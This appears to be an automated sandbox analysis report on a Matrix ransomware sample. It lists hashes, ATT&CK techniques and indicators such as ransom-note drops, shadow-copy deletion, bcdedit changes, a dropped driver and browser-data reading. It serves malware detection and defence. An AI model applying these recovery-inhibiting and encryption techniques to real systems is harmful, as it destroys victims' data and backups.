matrix | e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569

Analysis

max time kernel
150s
max time network
110s
platform
windows10_x64
resource
win10v20210410
submitted
01-05-2021 00:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
Size

4.8MB
MD5

739562b08a6131cce604c0e7ffa1a07d
SHA1

eabe2b22d6af539871b81625c0c3a3efb58afd90
SHA256

e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569
SHA512

457dd85e77bf9bd32275230185b7c350245729afeb7c0eaa50a52bbdc109ed41a0d9a4ecf16a186c3bf163f31e86d91060dcb7f7d64494bcb5f6ee21d8f32c9f

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exereg.exe

description	ioc	process
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ko\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\it\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\js\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\Java\jre1.8.0_66\lib\jfr\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ig-NG\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\odt\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{ae7842bf-d43f-44ec-b99f-9a992d422d48}\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Default\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pl\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\uz-Latn-UZ\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\Settings\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\VideoLAN\VLC\lua\extensions\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\mux\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\logs\setup\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_splitter\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ca\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Admin\Pictures\Saved Pictures\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\keystore\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\ProgramData\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\Prov\RunTime\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\TileWallpaper = "0"	reg.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\swiftshader\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Public\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\Google\Chrome\Application\SetupMetrics\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_output\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\platforms\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ru\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\ProgramData\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\Mozilla Firefox\uninstall\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\packetizer\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\cy-GB\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Public\Downloads\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\Prov\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bn-BD\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pt-BR\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\Java\jre1.8.0_66\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

4828 bcdedit.exe
4588 bcdedit.exe
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

76 4392 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

QhbGVYKB64.exe

description ioc process

File created C:\Windows\system32\Drivers\PROCEXP152.SYS QhbGVYKB64.exe
Executes dropped EXE 3 IoCs

Processes:

NWNCehUW.exeQhbGVYKB.exeQhbGVYKB64.exe

pid process

2448 NWNCehUW.exe
4424 QhbGVYKB.exe
2808 QhbGVYKB64.exe
Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
4828	bcdedit.exe
4588	bcdedit.exe

flow	pid	process
76	4392	powershell.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	QhbGVYKB64.exe

pid	process
2448	NWNCehUW.exe
4424	QhbGVYKB.exe
2808	QhbGVYKB64.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\QhbGVYKB.exe	upx
C:\Users\Admin\AppData\Local\Temp\QhbGVYKB.exe	upx

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exe

pid process

4148 takeown.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
4148	takeown.exe

Drops desktop.ini file(s) 26 IoCs

Processes:

e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Documents\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Users\Public\desktop.ini	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exeQhbGVYKB64.exe

description	ioc	process
File opened (read-only)	\??\K:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\E:	QhbGVYKB64.exe
File opened (read-only)	\??\K:	QhbGVYKB64.exe
File opened (read-only)	\??\Y:	QhbGVYKB64.exe
File opened (read-only)	\??\Z:	QhbGVYKB64.exe
File opened (read-only)	\??\W:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\M:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\Q:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\U:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\T:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\H:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\G:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\F:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\H:	QhbGVYKB64.exe
File opened (read-only)	\??\P:	QhbGVYKB64.exe
File opened (read-only)	\??\X:	QhbGVYKB64.exe
File opened (read-only)	\??\Y:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\S:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\A:	QhbGVYKB64.exe
File opened (read-only)	\??\I:	QhbGVYKB64.exe
File opened (read-only)	\??\L:	QhbGVYKB64.exe
File opened (read-only)	\??\O:	QhbGVYKB64.exe
File opened (read-only)	\??\R:	QhbGVYKB64.exe
File opened (read-only)	\??\L:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\E:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\O:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\F:	QhbGVYKB64.exe
File opened (read-only)	\??\G:	QhbGVYKB64.exe
File opened (read-only)	\??\J:	QhbGVYKB64.exe
File opened (read-only)	\??\N:	QhbGVYKB64.exe
File opened (read-only)	\??\Q:	QhbGVYKB64.exe
File opened (read-only)	\??\Z:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\P:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\V:	QhbGVYKB64.exe
File opened (read-only)	\??\S:	QhbGVYKB64.exe
File opened (read-only)	\??\U:	QhbGVYKB64.exe
File opened (read-only)	\??\M:	QhbGVYKB64.exe
File opened (read-only)	\??\W:	QhbGVYKB64.exe
File opened (read-only)	\??\V:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\B:	QhbGVYKB64.exe
File opened (read-only)	\??\N:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\J:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\X:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\R:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\I:	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened (read-only)	\??\T:	QhbGVYKB64.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

75 myexternalip.com

flow	ioc
75	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\o2R6BrBF.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

Processes:

e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe

description	ioc	process
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-crt-utility-l1-1-0.dll	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-services.jar	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\rjmx.jar	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyrun.jar	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-ui.xml	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro_5.5.0.165303.jar	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdate.dll	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_zh_4.4.0.v20140623020002.jar	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File created	C:\Program Files\VideoLAN\VLC\lua\sd\#ANN_README#.rtf	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.ja_5.5.0.165303.jar	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_gather_plugin.dll	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_imem_plugin.dll	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\bin\sysinfo	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\video_output\libwingdi_plugin.dll	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\masterix.gif	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\THIRDPARTYLICENSEREADME.txt	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\nbexec64.dll	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\packager.jar	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\control\libdummy_plugin.dll	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.greychartplugin_5.5.0.165303.jar	e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
